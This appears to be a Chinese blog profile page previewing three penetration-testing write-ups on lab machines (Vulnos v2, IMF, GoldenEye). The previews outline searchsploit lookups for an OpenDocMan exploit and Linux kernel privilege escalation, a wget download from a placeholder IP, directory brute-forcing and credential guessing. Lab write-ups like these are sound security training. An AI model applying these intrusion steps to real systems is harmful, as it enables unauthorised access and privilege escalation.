自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(3)
  • 收藏
  • 关注

原创 Vulnosv2 靶机训练

参考博客传送门 关键点:web系统可能在msf中保留有漏洞记录,找到相对应的版本攻击点进行攻击 searchsploit OpenDocMan 1.2.7 一般存放目录都放在 /usr/share/exploitdb下面 获得低权限用户后 可以考虑Linux内核提权 searchsploit Linux 3.13.0 搭建一个文件服务器 python -m SimpleHTTPServer 6666 下载 wget http://xxx.xxx.xxx.xxx 如果是c类型文件,需要gcc编译 找

2021-03-02 15:08:27 224

原创 IMF靶机复现

IMF靶机复现 发现靶机IP:192.168.8.198 搜寻开放端口,发现除了80端口外,没发现其他端口。 使用dirb 撞靶机的子域名 dirb http://192.168.8.198 并没有找到有用的域名 F12手动查找Flag 在contact.php中找到注释的Flag1 搜寻== 发现后三行乱码 疑似Flag,组合base64解码得到 对flag2的内容进行再解码,得到 : 可能是用户名密码或者是子域名,猜测得到网址192.168.8.198/imfadministrator

2021-02-23 15:53:13 382

原创 Goldeneye靶机实操

Goldeneye靶机实操信息搜集webshell用户提权 新手上路 请多多指教 信息搜集 接好靶机 发现IP为:192.168.8.144 发现 80端口开着 试试打开 用户是Boris无疑,密码是&#开头,盲猜unicode格式,站长之家一波,百度翻译的插件也可以 由于系统大小写敏感用户名被坑了~~hhh 多次尝试用户名为:boris 密码不变 /sev-home/登录后台 发现有用的信息,pop3端口被开启,转了一圈chrome发现后台刻意留下的两个账号。 按照pop3端口被打开的思

2021-02-03 10:27:40 744

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除